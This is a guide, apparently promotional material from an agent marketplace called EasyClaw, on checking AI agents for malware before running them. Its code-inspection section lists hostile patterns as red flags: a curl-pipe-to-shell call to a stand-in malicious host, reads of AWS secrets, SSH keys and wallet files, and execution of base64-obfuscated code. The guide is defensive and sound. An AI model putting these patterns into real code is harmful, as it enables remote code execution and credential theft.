How to Verify an AI Agent is Safe Before Running It

---

The Risk is Real

In February 2026, researchers found that 12% of agents on open registries contained malware. That is one in eight agents. If you are downloading agents from unverified sources, you are gambling with your data.

This guide shows you how to verify any AI agent's safety before running it, whether you download it from an open registry, receive it from a colleague, or build it yourself.

---

Step 1: Check the Source

Before you download anything, investigate where the agent comes from.

Questions to Ask

• Is the developer verified? Can you find their real identity, LinkedIn profile, or company website?
• Is the code on GitHub? Is the repository active, with recent commits and a clear history?
• Are there other users? Check download counts, reviews, and community discussions.
• Is there a security audit report? Has a third party reviewed the code?
• Is there a support channel? Can you reach the developer if something goes wrong?

Where to Look

| Signal | Good Sign | Red Flag | |--------|-----------|----------| | Developer identity | Real name, company, LinkedIn | Anonymous, no profile | | Repository activity | Recent commits, active issues | No updates in 6+ months | | Community | Active discussions, positive reviews | No reviews, no community | | Documentation | Detailed README, API docs | Minimal or no documentation | | License | Clear open-source license | No license or restrictive terms |

---

Step 2: Inspect the Code

If the agent is open source, read the code before running it. Here is what to look for.

Dangerous Patterns

These patterns are immediate red flags in any AI agent code:

# DANGEROUS - Direct code execution from user input
eval(user_input)
exec(user_input)
subprocess.run("curl malicious.com | sh")

# DANGEROUS - Credential harvesting
os.environ.get("AWS_SECRET_ACCESS_KEY")
open(os.path.expanduser("~/.ssh/id_rsa"))
glob.glob(os.path.expanduser("~/.*wallet*"))

# DANGEROUS - Obfuscated code
exec(base64.b64decode("aW1wb3J0IG9z..."))
eval(codecs.decode("import os", "rot_13"))

Safe Patterns

Legitimate agents follow these patterns:

# SAFE - Structured input processing
result = agent.process(validated_input)

# SAFE - Explicit permission requests
if user.has_granted_permission("file_access"):
    data = read_file(path)

# SAFE - Scoped API access
client = APIClient(api_key=scoped_key, permissions=["read_only"])

# SAFE - Sandboxed execution
with sandbox.isolated_environment():
    output = agent.run(task)

What to Check Specifically

1. Network calls — Does the agent make HTTP requests? To where? Are the domains legitimate?
2. File system access — What files does the agent read or write? Is it accessing anything outside its working directory?
3. Environment variables — Does it read sensitive environment variables like API keys, tokens, or credentials?
4. Dependencies — What libraries does it import? Are they well-known and trusted?
5. Obfuscation — Is any code base64-encoded, encrypted, or otherwise obfuscated? This is almost always malicious.

---

Step 3: Scan Dependencies

Modern AI agents rely on dozens of dependencies. Each one is a potential attack vector.

How to Audit Dependencies

1. Check the dependency file — Look at requirements.txt, package.json, or Cargo.toml
2. Verify package names — Typosquatting is common (e.g., reqeusts instead of requests)
3. Check version pinning — Are versions pinned to specific releases, or do they pull "latest"?
4. Look for known vulnerabilities — Use tools like npm audit, pip-audit, or Snyk

Common Supply Chain Attacks

| Attack | How It Works | How to Detect | |--------|-------------|---------------| | Typosquatting | Malicious package with similar name | Manual name verification | | Dependency confusion | Internal package name hijacked on public registry | Check package source | | Version poisoning | Malicious code in a specific version | Pin versions, review changelogs | | Abandoned package takeover | Attacker gains control of unmaintained package | Check maintainer activity |

---

Step 4: Test in Isolation

Never run a new agent on your production machine. Always test in a sandbox first.

Sandbox Options

| Method | Isolation Level | Difficulty | Best For | |--------|----------------|------------|----------| | Docker container | High | Easy | Most agents | | Virtual machine | Very high | Medium | Agents that need OS access | | Cloud sandbox (AWS, GCP) | Very high | Medium | Agents that make network calls | | Dedicated test machine | Maximum | Easy | High-risk agents |

Testing Checklist

1. Start with no internet access — Run the agent in a sandboxed environment with no outbound network. Does it crash? Does it try to "phone home"?
2. Monitor all file system access — Use tools like strace (Linux) or fs_usage (macOS) to see every file the agent reads or writes.
3. Check network activity — Enable network access and monitor all outbound connections. Unknown domains are a red flag.
4. Run for 24-48 hours — Some malware has delayed activation. Run the agent for at least 24 hours and monitor behavior.
5. Check CPU and memory usage — Unexpected resource consumption may indicate crypto mining or data processing.

---

Step 5: Limit Permissions

The Principle of Least Privilege

| Resource | Never Give | Instead Give | |----------|-----------|-------------| | File system | Full disk access | Specific directory only | | API keys | Admin/root keys | Scoped read-only keys | | Network | Unrestricted | Allowlisted domains only | | User account | Root/admin | Dedicated service account | | Database | Write access to all tables | Read-only to specific tables |

How to Scope Permissions

1. Create dedicated API keys — Every major platform (AWS, GCP, Stripe, etc.) supports scoped API keys. Create a key that has only the permissions the agent needs.
2. Use a service account — Run the agent under a dedicated user account with restricted permissions, not your personal account.
3. Restrict network access — Use firewall rules to allow only the specific domains the agent needs to communicate with.
4. Mount read-only directories — If the agent needs to read files, mount the directory as read-only. It should not be able to write or delete.

---

Step 6: Monitor After Deployment

Security does not end at installation. Monitor agents continuously.

Ongoing Monitoring Checklist

• Weekly: Review network logs for unusual outbound connections
• Weekly: Check file system for unexpected changes
• Monthly: Re-scan dependencies for new vulnerabilities
• Monthly: Review API key usage for anomalies
• Quarterly: Full security re-audit of agent code

---

How EasyClaw Verifies Agents

At EasyClaw, we do all of this so you don't have to. Every agent passes our four-stage verification before listing:

1. Developer identity verification — Real person, verified identity. No anonymous accounts.
2. Automated security scanning — Static analysis for known malware patterns, credential harvesting, and obfuscated code.
3. Manual code review — Human security expert inspects the source code.
4. Sandbox testing — 48+ hours of monitored execution in an isolated environment.

---

What to Do If You're Compromised

If you suspect an agent has compromised your system:

1. Disconnect the agent immediately — Kill the process and remove network access
2. Revoke all credentials — Rotate every API key, password, and token the agent had access to
3. Scan your system — Run a full antivirus and malware scan
4. Check for persistence — Look for new cron jobs, startup items, or background processes
5. Review logs — Check network logs for data exfiltration
6. Report to the platform — If the agent came from a marketplace, report it
7. Notify affected parties — If customer data was exposed, follow your incident response plan

---

Conclusion

The risks of running unverified AI agents are real but manageable. Follow this guide, stay vigilant, and when in doubt, use verified agents from a marketplace that does the security work for you.

EasyClaw exists because we believe you shouldn't need a security engineering degree to safely use AI agents. Every agent on our platform is verified, supported, and backed by a 30-day refund guarantee.

---

Last updated: February 21, 2026